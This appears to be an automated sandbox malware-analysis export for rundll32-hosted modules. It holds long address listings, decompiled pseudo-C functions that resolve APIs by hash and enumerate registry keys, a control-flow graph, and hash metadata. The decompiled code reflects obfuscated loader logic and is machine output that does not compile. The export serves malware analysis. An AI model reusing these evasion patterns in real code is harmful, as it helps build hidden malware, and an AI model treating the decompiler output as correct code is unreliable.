                          0x21dd9336df0
                          0x21dd9336df3
                          0x21dd9336df7
                          0x21dd9336e06
                          0x21dd9336e11
                          0x21dd9336e22
                          0x21dd9336e36
                          0x21dd9336e42
                          0x21dd9336e54
                          0x21dd9336e5b
                          0x21dd9336e63
                          0x21dd9336e6b
                          0x21dd9336e75
                          0x21dd9336e7e
                          0x21dd9336e86
                          0x21dd9336e8b
                          0x21dd9336e8d
                          0x21dd9336e98
                          0x21dd9336e9d
                          0x21dd9336ea6
                          0x21dd9336eae
                          0x21dd9336ebd
                          0x21dd9336ec9
                          0x21dd9336ed4
                          0x21dd9336eda
                          0x21dd9336edc
                          0x21dd9336edf
                          0x21dd9336ee5
                          0x21dd9336ef2
                          0x21dd9336efa
                          0x21dd9336eff
                          0x21dd9336f01
                          0x21dd9336f05
                          0x21dd9336f0f
                          0x21dd9336f0f
                          0x21dd9336f17
                          0x21dd9336f25
                          0x21dd9336f2a
                          0x21dd9336f32
                          0x21dd9336f37
                          0x21dd9336f39
                          0x21dd9336f3c
                          0x21dd9336f40
                          0x21dd9336f44
                          0x21dd9336f4b
                          0x21dd9336f4d
                          0x21dd9336f50
                          0x21dd9336f56
                          0x21dd9336f5b
                          0x21dd9336f60
                          0x21dd9336f62
                          0x21dd9336f67
                          0x21dd9336f70
                          0x21dd9336f72
                          0x21dd9336f80
                          0x21dd9336f8f
                          0x21dd9336f9f
                          0x21dd9336fa6
                          0x21dd9336fb5
                          0x21dd9336fb9
                          0x21dd9336fbd
                          0x21dd9336fc5
                          0x21dd9336fc7
                          0x21dd9336fcb
                          0x21dd9336fd9
                          0x21dd9336fe1
                          0x21dd9336fe8
                          0x21dd9336fed
                          0x21dd9336ffc
                          0x21dd933700a
                          0x21dd933701f
                          0x21dd933702d
                          0x21dd933704d
                          0x21dd9337055
                          0x21dd933707b
                          0x21dd9337090
                          0x21dd9337095
                          0x21dd933709e
                          0x21dd93370a2
                          0x21dd93370ab
                          0x21dd93370cb
                          0x21dd93370db
                          0x21dd93370db
                          0x21dd93370eb
                          0x21dd93370f8
                          0x21dd9337100
                          0x21dd9337107
                          0x21dd9337112
                          0x21dd9337117
                          0x21dd933711e
                          0x21dd933712c
                          0x21dd933712f
                          0x21dd933713d
                          0x21dd9337145
                          0x21dd933714c
                          0x21dd9337158
                          0x21dd933715e
                          0x21dd9337166
                          0x21dd9337189
                          0x21dd93371a5
                          0x21dd93371b4
                          0x21dd93371cd
                          0x21dd93371d5
                          0x21dd93371dc
                          0x21dd93371e7
                          0x21dd93371ef
                          0x21dd93371f6
                          0x21dd933720c
                          0x21dd933720f
                          0x21dd9337214
                          0x21dd933721c
                          0x21dd9337224
                          0x21dd933722b
                          0x21dd933722d
                          0x21dd9337234
                          0x21dd9337257

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID: uJ$uJ$uJ
                          • API String ID: 1659099196-303439786
                          • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction ID: b8c388b56436b7110bc0e13ef041c9f93842b38e97c70e0105bf69aca30ea4ba
                          • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction Fuzzy Hash: 4CC19133645B80D9EB68DF62B4483DA67A0FBA8B84F485025DE8E437A9DF3AC455C740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E0000021D21DD9337FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
                          				void* __rdi;
                          				signed int _t34;
                          				void* _t66;
                          				char* _t104;
                          				void* _t131;
                          				char* _t134;
                          				long long _t140;
                          				void* _t141;
                          				void* _t143;
                          				void* _t144;
                          				signed long long _t156;
                          				void* _t158;
                          
                          				_t106 = __rbx;
                          				_t104 = __rax;
                          				 *((long long*)(_t143 + 8)) = __rbx;
                          				 *((long long*)(_t143 + 0x18)) = _t140;
                          				 *((long long*)(_t143 + 0x20)) = __rsi;
                          				_t144 = _t143 - 0x40;
                          				r14d =  *0xd933d450;
                          				_t141 = __rcx;
                          				_t137 =  *((intOrPtr*)( *0xd933d458 + 8));
                          				r12d = 0;
                          				_t34 = r14d ^ __edx;
                          				if (_t34 == 0x139d2b8d) goto 0xd93380ef;
                          				if (_t34 == 0x15f5a8c2) goto 0xd9338115;
                          				if (_t34 == 0x2f77acf9) goto 0xd93380e9;
                          				if (_t34 == 0x48e12436) goto 0xd93381c8;
                          				if (_t34 == 0x4d382929) goto 0xd9338164;
                          				if (_t34 == 0xb016dc39) goto 0xd93380c9;
                          				if (_t34 == 0xb057dfc9) goto 0xd933805b;
                          				goto 0xd933821b;
                          				if (r9d == 0) goto 0xd93380bf;
                          				E0000021D21DD93385CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0xd933d458 + 8)), _t158);
                          				if (_t104 == 0) goto 0xd93380b5;
                          				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
                          				if (E0000021D21DD93314B8(_t104, _t106, _t141, 0x21dd93334a4,  *((intOrPtr*)( *0xd933d458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0xd93380a2;
                          				goto 0xd933821b;
                          				HeapFree(_t131, ??);
                          				goto 0xd933821b;
                          				goto 0xd933821b;
                          				goto 0xd933821b;
                          				E0000021D21DD933908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0xd933d458 + 8)) + 0x18)));
                          				if (_t104 == 0) goto 0xd93380e2;
                          				 *_t104();
                          				goto 0xd933821b;
                          				r12d = 1;
                          				if ( *(_t141 + 0x50) == 0) goto 0xd933814a;
                          				E0000021D21DD933908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
                          				if (_t104 == 0) goto 0xd9338139;
                          				 *_t104();
                          				goto 0xd933813e;
                          				if (r9d == 0) goto 0xd93380bf;
                          				E0000021D21DD93385CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0xd933d458 + 8)), _t156);
                          				_t134 = _t104;
                          				if (_t104 == 0) goto 0xd93380b5;
                          				goto 0xd933807a;
                          				asm("sbb ebx, ebx");
                          				goto 0xd933814f;
                          				if (r12d == 0) goto 0xd933821b;
                          				if (0x426 != 0x426) goto 0xd933821b;
                          				if (_t134 == 0) goto 0xd93381be;
                          				if ( *_t134 == 0) goto 0xd93381be;
                          				0xd933487a();
                          				if (E0000021D21DD9335448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0xd93381bc;
                          				if (E0000021D21DD933672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0xd93381be;
                          				asm("ror ax, 0x8");
                          				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
                          				r12d = 1;
                          				if (0 != 0) goto 0xd933821b;
                          				if ( *(_t141 + 0x50) == 0) goto 0xd93381fb;
                          				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
                          				E0000021D21DD9332874( *((intOrPtr*)( *0xd933d458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
                          				HeapFree(??, ??, ??);
                          				goto 0xd9338200;
                          				if (r12d == 0) goto 0xd933821b;
                          				_t27 = _t144 + 0x30; // 0x31
                          				_t66 = E0000021D21DD9339214( *((intOrPtr*)( *0xd933d458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
                          				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0xd9338241;
                          				if (_t66 == 0x3e5) goto 0xd9338241;
                          				r8d = _t66;
                          				E0000021D21DD9336AC0( *0xd933d458,  *((intOrPtr*)( *0xd933d458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
                          				return _t66;
                          			}















                          0x21dd9337fd4
                          0x21dd9337fd4
                          0x21dd9337fd4
                          0x21dd9337fd9
                          0x21dd9337fde
                          0x21dd9337fe8
                          0x21dd9337fec
                          0x21dd9337ff3
                          0x21dd9337ffd
                          0x21dd9338004
                          0x21dd9338007
                          0x21dd9338011
                          0x21dd933801c
                          0x21dd9338027
                          0x21dd9338032
                          0x21dd933803d
                          0x21dd9338048
                          0x21dd933804f
                          0x21dd9338056
                          0x21dd933805e
                          0x21dd9338066
                          0x21dd9338071
                          0x21dd9338082
                          0x21dd9338096
                          0x21dd933809d
                          0x21dd93380aa
                          0x21dd93380b0
                          0x21dd93380ba
                          0x21dd93380c4
                          0x21dd93380d2
                          0x21dd93380da
                          0x21dd93380e0
                          0x21dd93380e4
                          0x21dd93380e9
                          0x21dd93380f6
                          0x21dd9338101
                          0x21dd9338109
                          0x21dd9338111
                          0x21dd9338113
                          0x21dd9338118
                          0x21dd9338120
                          0x21dd9338125
                          0x21dd933812b
                          0x21dd9338134
                          0x21dd9338140
                          0x21dd9338148
                          0x21dd9338152
                          0x21dd933815e
                          0x21dd933816c
                          0x21dd9338171
                          0x21dd9338185
                          0x21dd9338199
                          0x21dd93381ac
                          0x21dd93381b3
                          0x21dd93381b7
                          0x21dd93381be
                          0x21dd93381c6
                          0x21dd93381cf
                          0x21dd93381d1
                          0x21dd93381e4
                          0x21dd93381f1
                          0x21dd93381f9
                          0x21dd9338203
                          0x21dd933820d
                          0x21dd9338219
                          0x21dd9338224
                          0x21dd933822c
                          0x21dd9338236
                          0x21dd933823c
                          0x21dd933825b

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID: ))8M$6$H$lJu
                          • API String ID: 3298025750-2816507560
                          • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction ID: 33e0d49d62cddb99173bc5dc80c5aced7d23a218d75801477fa5d762dac30ba0
                          • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction Fuzzy Hash: C961B933684B41D3FB6C9FE6B4883EA12A1B764784F546121EE49877BDDF7AC8458300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1f71cc037e0-1f71cc03845 GetModuleHandleA call 1f71cc040f8 3 1f71cc03847-1f71cc03858 call 1f71cc0908c 0->3 4 1f71cc038bf-1f71cc038c2 0->4 12 1f71cc0385a-1f71cc03864 3->12 13 1f71cc03866 3->13 6 1f71cc038c8-1f71cc038e1 HeapAlloc 4->6 7 1f71cc03cc0-1f71cc03cd5 4->7 8 1f71cc038e7-1f71cc03905 call 1f71cc0487a call 1f71cc0908c 6->8 9 1f71cc03cbb 6->9 21 1f71cc03907 8->21 22 1f71cc0390d-1f71cc0394c call 1f71cc0638c call 1f71cc0908c 8->22 9->7 15 1f71cc03869-1f71cc0387a call 1f71cc040f8 12->15 13->15 15->4 23 1f71cc0387c-1f71cc03888 call 1f71cc05fc8 15->23 21->22 33 1f71cc0395e 22->33 34 1f71cc0394e-1f71cc0395c 22->34 26 1f71cc0388d-1f71cc03892 23->26 26->4 28 1f71cc03894-1f71cc038aa call 1f71cc05fc8 26->28 28->4 36 1f71cc038ac-1f71cc038bd call 1f71cc05fc8 28->36 35 1f71cc03961-1f71cc03968 33->35 34->35 37 1f71cc0396a-1f71cc0397b call 1f71cc0908c 35->37 38 1f71cc0398e-1f71cc039b6 HeapAlloc 35->38 36->4 50 1f71cc0397d-1f71cc0397f 37->50 51 1f71cc03984-1f71cc03989 37->51 42 1f71cc039bc-1f71cc039d0 call 1f71cc0908c 38->42 43 1f71cc03a8e 38->43 55 1f71cc039fb 42->55 56 1f71cc039d2-1f71cc039f9 RegOpenKeyW 42->56 45 1f71cc03a93-1f71cc03a99 43->45 48 1f71cc03a9f-1f71cc03ae9 call 1f71cc047b0 call 1f71cc0a0ac 45->48 49 1f71cc03cb1-1f71cc03cb9 call 1f71cc06ce4 45->49 69 1f71cc03aeb-1f71cc03b03 call 1f71cc0a0ac 48->69 70 1f71cc03b05-1f71cc03b08 48->70 49->7 63 1f71cc03caa 50->63 54 1f71cc03cac-1f71cc03caf 51->54 54->7 54->49 60 1f71cc039fe-1f71cc03a00 55->60 56->60 64 1f71cc03a7e-1f71cc03a8c HeapFree 60->64 65 1f71cc03a02-1f71cc03a13 call 1f71cc0908c 60->65 63->54 64->45 71 1f71cc03a30 65->71 72 1f71cc03a15-1f71cc03a2e RegEnumKeyW 65->72 69->70 70->49 74 1f71cc03b0e-1f71cc03b1f call 1f71cc05058 70->74 75 1f71cc03a33-1f71cc03a35 71->75 72->75 84 1f71cc03b4b-1f71cc03b4e 74->84 85 1f71cc03b21-1f71cc03b35 call 1f71cc0405c 74->85 78 1f71cc03a37-1f71cc03a4a call 1f71cc06644 75->78 79 1f71cc03a4c-1f71cc03a52 75->79 78->65 78->79 82 1f71cc03a5d-1f71cc03a6e call 1f71cc0908c 79->82 83 1f71cc03a54-1f71cc03a5b 79->83 95 1f71cc03a7a-1f71cc03a7c 82->95 96 1f71cc03a70-1f71cc03a78 RegCloseKey 82->96 83->82 84->49 86 1f71cc03b54-1f71cc03b57 call 1f71cc0a7a0 84->86 85->84 93 1f71cc03b37-1f71cc03b47 call 1f71cc0405c 85->93 94 1f71cc03b5c-1f71cc03b5f 86->94 93->84 98 1f71cc03b6b-1f71cc03b99 94->98 99 1f71cc03b61-1f71cc03b66 94->99 95->45 95->64 96->95 101 1f71cc03b9b-1f71cc03ba3 98->101 102 1f71cc03baf 98->102 99->49 103 1f71cc03bb2-1f71cc03bb5 101->103 104 1f71cc03ba5-1f71cc03bad call 1f71cc04d70 101->104 102->103 105 1f71cc03bb7-1f71cc03bbc 103->105 106 1f71cc03bc1-1f71cc03bd6 call 1f71cc0a8e8 103->106 104->103 105->49 106->105 111 1f71cc03bd8-1f71cc03bf4 call 1f71cc0908c 106->111 114 1f71cc03bfc 111->114 115 1f71cc03bf6-1f71cc03bfa 111->115 116 1f71cc03bff-1f71cc03c07 114->116 115->116 118 1f71cc03c9d-1f71cc03ca5 call 1f71cc09d6c 116->118 119 1f71cc03c0d-1f71cc03c1e call 1f71cc0908c 116->119 118->63 123 1f71cc03c20-1f71cc03c24 119->123 124 1f71cc03c26 119->124 125 1f71cc03c29-1f71cc03c3a call 1f71cc0908c 123->125 124->125 129 1f71cc03c4b 125->129 130 1f71cc03c3c-1f71cc03c49 125->130 131 1f71cc03c4e-1f71cc03c55 129->131 130->131 133 1f71cc03c57-1f71cc03c64 call 1f71cc0908c 131->133 134 1f71cc03c6f-1f71cc03c7c call 1f71cc0908c 131->134 133->50 141 1f71cc03c6a-1f71cc03c6d 133->141 139 1f71cc03c7e-1f71cc03c8d 134->139 140 1f71cc03c8f 134->140 142 1f71cc03c92-1f71cc03c95 139->142 140->142 141->54 142->7 144 1f71cc03c97-1f71cc03c9b 142->144 144->133
                          C-Code - Quality: 38%
                          			E000001F71F71CC037E0(long long* __rax, long long __rcx, void* __r9) {
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t80;
                          				void* _t83;
                          				void* _t84;
                          				void* _t100;
                          				void* _t176;
                          				long long* _t222;
                          				long long* _t223;
                          				long long* _t224;
                          				long long _t225;
                          				intOrPtr _t226;
                          				long long* _t228;
                          				long long* _t229;
                          				void* _t230;
                          				void* _t288;
                          				long long _t289;
                          				void* _t291;
                          				void* _t294;
                          				intOrPtr _t295;
                          				intOrPtr _t296;
                          				void* _t300;
                          				void* _t301;
                          				void* _t303;
                          				void* _t310;
                          				void* _t313;
                          				long long _t314;
                          				void* _t315;
                          				void* _t316;
                          				long long _t319;
                          				long long* _t320;
                          				void* _t322;
                          				CHAR* _t327;
                          
                          				_t222 = __rax;
                          				 *((long long*)(_t300 + 8)) = __rcx;
                          				_t301 = _t300 - 0x248;
                          				_t292 =  *0x1cc0d458;
                          				_t295 =  *((intOrPtr*)( *0x1cc0d458 + 8));
                          				 *((long long*)(_t301 + 0x20)) =  *0x1cc0d448;
                          				 *(_t301 + 0x298) =  *0x1cc0d450;
                          				GetModuleHandleA(_t327);
                          				_t80 = E000001F71F71CC040F8(__rax,  *0x1cc0d458 + 0x18, _t303, _t313, _t322, _t319);
                          				r13d = 0;
                          				if (_t80 != r13d) goto 0x1cc038bf;
                          				E000001F71F71CC0908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t222 == _t319) goto 0x1cc03866;
                          				 *_t222();
                          				goto 0x1cc03869;
                          				_t223 = _t319;
                          				_t83 = E000001F71F71CC040F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288); // executed
                          				if (_t83 != r13d) goto 0x1cc038bf;
                          				_t84 = E000001F71F71CC05FC8(_t223, _t230,  *0x1cc0d448 + 0x1f71cc11082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
                          				if (_t84 != r13d) goto 0x1cc038bf;
                          				if (E000001F71F71CC05FC8(_t223, _t230,  *0x1cc0d448 + 0x1f71cc11079, _t292 + 0x20, _t292, _t295) != r13d) goto 0x1cc038bf;
                          				if (E000001F71F71CC05FC8(_t223, _t230,  *0x1cc0d448 + 0x1f71cc11092, _t292 + 0x30, _t292, _t295) != r13d) goto 0x1cc03cc0;
                          				HeapAlloc(??, ??, ??);
                          				_t289 = _t223;
                          				if (_t223 == _t319) goto 0x1cc03cbb;
                          				0x1cc0487a();
                          				E000001F71F71CC0908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
                          				if (_t223 == _t319) goto 0x1cc0390d;
                          				 *_t223();
                          				_t24 = _t289 + 0xa8; // 0xa8
                          				_t224 = _t24;
                          				 *_t224 = _t224;
                          				 *((long long*)(_t289 + 0xb0)) = _t224;
                          				 *(_t289 + 0x9c) = r13d;
                          				 *(_t289 + 0xa0) = r13d;
                          				 *(_t289 + 0x98) = r13d;
                          				E000001F71F71CC0638C(_t224, _t230, _t292, _t230);
                          				E000001F71F71CC0908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t224 == _t319) goto 0x1cc0395e;
                          				r9d = 0;
                          				r8d = 0;
                          				 *_t224();
                          				goto 0x1cc03961;
                          				_t225 = _t319;
                          				 *((long long*)(_t289 + 0x28)) = _t225;
                          				if (_t225 != _t319) goto 0x1cc0398e;
                          				E000001F71F71CC0908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t225 == _t319) goto 0x1cc03984;
                          				 *_t225();
                          				goto 0x1cc03caa;
                          				goto 0x1cc03cac;
                          				r8d = 0x1102;
                          				HeapAlloc(??, ??, ??);
                          				_t320 = _t225;
                          				_t34 = _t295 + 0x7f; // 0x7f
                          				r12d = _t34;
                          				if (_t225 == _t295) goto 0x1cc03a8e;
                          				 *_t225 = 0;
                          				E000001F71F71CC0908C(0x3d06c463, _t225,  *((intOrPtr*)( *0x1cc0d458 + 0x20)));
                          				if (_t225 == _t295) goto 0x1cc039fb;
                          				RegOpenKeyW(??, ??, ??); // executed
                          				goto 0x1cc039fe;
                          				if (r12d != 0) goto 0x1cc03a7e;
                          				E000001F71F71CC0908C(0xdf514773, _t225,  *((intOrPtr*)( *0x1cc0d458 + 0x20)));
                          				if (_t225 == 0) goto 0x1cc03a30;
                          				r9d = 0x104;
                          				RegEnumKeyW(??, ??, ??, ??); // executed
                          				goto 0x1cc03a33;
                          				if (r12d != 0) goto 0x1cc03a4c;
                          				_t100 = E000001F71F71CC06644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
                          				if (_t100 == 0) goto 0x1cc03a02;
                          				if (_t100 != 0x103) goto 0x1cc03a5d;
                          				 *0x1cc0d438 = _t320;
                          				E000001F71F71CC0908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0x1cc0d458 + 0x20)));
                          				if (_t225 == 0) goto 0x1cc03a7a;
                          				RegCloseKey(??); // executed
                          				if (0 == 0) goto 0x1cc03a93;
                          				HeapFree(??, ??, ??);
                          				goto 0x1cc03a93;
                          				r13d = 0;
                          				if (8 != r13d) goto 0x1cc03cb1;
                          				_t296 =  *0x1cc0d448;
                          				_t47 = _t320 + 8; // 0x8
                          				r8d = _t47;
                          				0x1cc047b0();
                          				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
                          				if (E000001F71F71CC0A0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x1f71cc00000 + _t296 + 0x11188) == r13d) goto 0x1cc03b05;
                          				_t310 = 0x1f71cc00000 + _t296 + 0x111e0;
                          				if (E000001F71F71CC0A0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0x1cc03cb1;
                          				_t57 = _t289 + 8; // 0x8
                          				_t286 = _t57;
                          				if (E000001F71F71CC05058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0x1cc03b4b;
                          				E000001F71F71CC0405C(_t230, _t289, _t57, _t289, _t292, _t296);
                          				 *((long long*)(_t289 + 0x30)) = _t225;
                          				if (_t225 == _t320) goto 0x1cc03b4b;
                          				_t59 = _t289 + 8; // 0x8
                          				E000001F71F71CC0405C(_t230, _t59, _t57, _t289, _t292, _t296);
                          				 *((long long*)(_t289 + 0x38)) = _t225;
                          				_t144 =  !=  ? r13d : 8;
                          				_t207 = ( !=  ? r13d : 8) - r13d;
                          				if (( !=  ? r13d : 8) != r13d) goto 0x1cc03cb1;
                          				if (E000001F71F71CC0A7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0x1cc03b6b;
                          				goto 0x1cc03cb1;
                          				_t226 =  *((intOrPtr*)(_t301 + 0x20));
                          				r9d =  *(_t301 + 0x298);
                          				_t314 = _t226 + 0x1f71cc0f000;
                          				r8d =  *(_t314 + 2) & 0x0000ffff;
                          				if (_t226 - _t310 + 8 <= 0) goto 0x1cc03baf;
                          				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0x1cc03bb2;
                          				E000001F71F71CC04D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
                          				goto 0x1cc03bb2;
                          				_t228 = _t320;
                          				if (_t228 != _t320) goto 0x1cc03bc1;
                          				goto 0x1cc03cb1;
                          				r9d = r9d ^ 0xecb028fc;
                          				E000001F71F71CC0A8E8(r9d, _t228, _t314, __r9);
                          				if (_t228 == _t320) goto 0x1cc03bb7;
                          				 *((long long*)(_t289 + 0x40)) = _t314;
                          				 *0x1cc0d440 = _t289;
                          				E000001F71F71CC0908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t228 == _t320) goto 0x1cc03bfc;
                          				 *_t228();
                          				goto 0x1cc03bff;
                          				_t229 = _t320;
                          				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0x1cc03c9d;
                          				E000001F71F71CC0908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0x1cc03c26;
                          				 *_t229();
                          				goto 0x1cc03c29;
                          				E000001F71F71CC0908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0x1cc03c4b;
                          				r8d = r13d;
                          				 *_t229();
                          				goto 0x1cc03c4e;
                          				if (_t320 != _t320) goto 0x1cc03c6f;
                          				E000001F71F71CC0908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 != _t320) goto 0x1cc0397d;
                          				goto 0x1cc03cac;
                          				E000001F71F71CC0908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0x1cc03c8f;
                          				 *_t229();
                          				goto 0x1cc03c92;
                          				if (r13d != r13d) goto 0x1cc03cc0;
                          				goto 0x1cc03c57;
                          				asm("lock add dword [esi+0x38], 0x1");
                          				if (E000001F71F71CC09D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0x1cc03cc0;
                          				E000001F71F71CC06CE4(_t229, _t230, _t289, _t320, _t292);
                          				goto 0x1cc03cc0;
                          				return 8;
                          			}






































                          0x1f71cc037e0
                          0x1f71cc037e0
                          0x1f71cc037f1
                          0x1f71cc037ff
                          0x1f71cc0380c
                          0x1f71cc03817
                          0x1f71cc03824
                          0x1f71cc0382b
                          0x1f71cc03838
                          0x1f71cc0383d
                          0x1f71cc03845
                          0x1f71cc03850
                          0x1f71cc03858
                          0x1f71cc03862
                          0x1f71cc03864
                          0x1f71cc03866
                          0x1f71cc03870
                          0x1f71cc0387a
                          0x1f71cc03888
                          0x1f71cc03892
                          0x1f71cc038aa
                          0x1f71cc038c2
                          0x1f71cc038d5
                          0x1f71cc038db
                          0x1f71cc038e1
                          0x1f71cc038ef
                          0x1f71cc038fd
                          0x1f71cc03905
                          0x1f71cc0390b
                          0x1f71cc0390d
                          0x1f71cc0390d
                          0x1f71cc03917
                          0x1f71cc0391a
                          0x1f71cc03921
                          0x1f71cc03928
                          0x1f71cc0392f
                          0x1f71cc03936
                          0x1f71cc03944
                          0x1f71cc0394c
                          0x1f71cc0394e
                          0x1f71cc03951
                          0x1f71cc0395a
                          0x1f71cc0395c
                          0x1f71cc0395e
                          0x1f71cc03961
                          0x1f71cc03968
                          0x1f71cc03973
                          0x1f71cc0397b
                          0x1f71cc0397d
                          0x1f71cc0397f
                          0x1f71cc03989
                          0x1f71cc03997
                          0x1f71cc039a4
                          0x1f71cc039ac
                          0x1f71cc039af
                          0x1f71cc039af
                          0x1f71cc039b6
                          0x1f71cc039bc
                          0x1f71cc039c8
                          0x1f71cc039d0
                          0x1f71cc039f5
                          0x1f71cc039f9
                          0x1f71cc03a00
                          0x1f71cc03a0b
                          0x1f71cc03a13
                          0x1f71cc03a22
                          0x1f71cc03a2a
                          0x1f71cc03a2e
                          0x1f71cc03a35
                          0x1f71cc03a41
                          0x1f71cc03a4a
                          0x1f71cc03a52
                          0x1f71cc03a54
                          0x1f71cc03a66
                          0x1f71cc03a6e
                          0x1f71cc03a78
                          0x1f71cc03a7c
                          0x1f71cc03a86
                          0x1f71cc03a8c
                          0x1f71cc03a93
                          0x1f71cc03a99
                          0x1f71cc03a9f
                          0x1f71cc03aa6
                          0x1f71cc03aa6
                          0x1f71cc03ab7
                          0x1f71cc03ad6
                          0x1f71cc03ae9
                          0x1f71cc03aeb
                          0x1f71cc03b08
                          0x1f71cc03b0e
                          0x1f71cc03b0e
                          0x1f71cc03b1f
                          0x1f71cc03b29
                          0x1f71cc03b2e
                          0x1f71cc03b35
                          0x1f71cc03b37
                          0x1f71cc03b3b
                          0x1f71cc03b43
                          0x1f71cc03b47
                          0x1f71cc03b4b
                          0x1f71cc03b4e
                          0x1f71cc03b5f
                          0x1f71cc03b66
                          0x1f71cc03b6b
                          0x1f71cc03b70
                          0x1f71cc03b78
                          0x1f71cc03b83
                          0x1f71cc03b99
                          0x1f71cc03ba3
                          0x1f71cc03ba8
                          0x1f71cc03bad
                          0x1f71cc03baf
                          0x1f71cc03bb5
                          0x1f71cc03bbc
                          0x1f71cc03bc1
                          0x1f71cc03bce
                          0x1f71cc03bd6
                          0x1f71cc03bd8
                          0x1f71cc03be5
                          0x1f71cc03bec
                          0x1f71cc03bf4
                          0x1f71cc03bf8
                          0x1f71cc03bfa
                          0x1f71cc03bfc
                          0x1f71cc03c07
                          0x1f71cc03c16
                          0x1f71cc03c1e
                          0x1f71cc03c20
                          0x1f71cc03c24
                          0x1f71cc03c32
                          0x1f71cc03c3a
                          0x1f71cc03c3e
                          0x1f71cc03c44
                          0x1f71cc03c49
                          0x1f71cc03c55
                          0x1f71cc03c5c
                          0x1f71cc03c64
                          0x1f71cc03c6d
                          0x1f71cc03c74
                          0x1f71cc03c7c
                          0x1f71cc03c8b
                          0x1f71cc03c8d
                          0x1f71cc03c95
                          0x1f71cc03c9b
                          0x1f71cc03c9d
                          0x1f71cc03caf
                          0x1f71cc03cb4
                          0x1f71cc03cb9
                          0x1f71cc03cd5

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                          • String ID:
                          • API String ID: 2248784776-0
                          • Opcode ID: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                          • Instruction ID: db2cb7b37ec10181b31d3570f357eb27cfe13ca6a87d98e11f7f56edb4e287ce
                          • Opcode Fuzzy Hash: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                          • Instruction Fuzzy Hash: D0D18C3D70CE8296FA609FE1A4843FB6251F788B88F584532CA4A477D5DE78DDAD8301
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Memory Dump Source
